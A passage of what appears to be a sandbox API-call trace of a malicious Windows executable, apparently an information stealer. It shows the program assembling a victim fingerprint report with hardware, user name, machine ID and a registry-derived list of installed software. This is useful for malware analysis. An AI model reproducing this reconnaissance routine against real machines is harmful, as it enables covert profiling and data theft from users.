MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\n", lpString2="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030" [0175.945] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="11.0.61030", lpcbData=0x197fd4*=0xb) returned 0x0 [0175.945] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 " [0175.945] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 ", lpString2="11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030" [0175.945] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 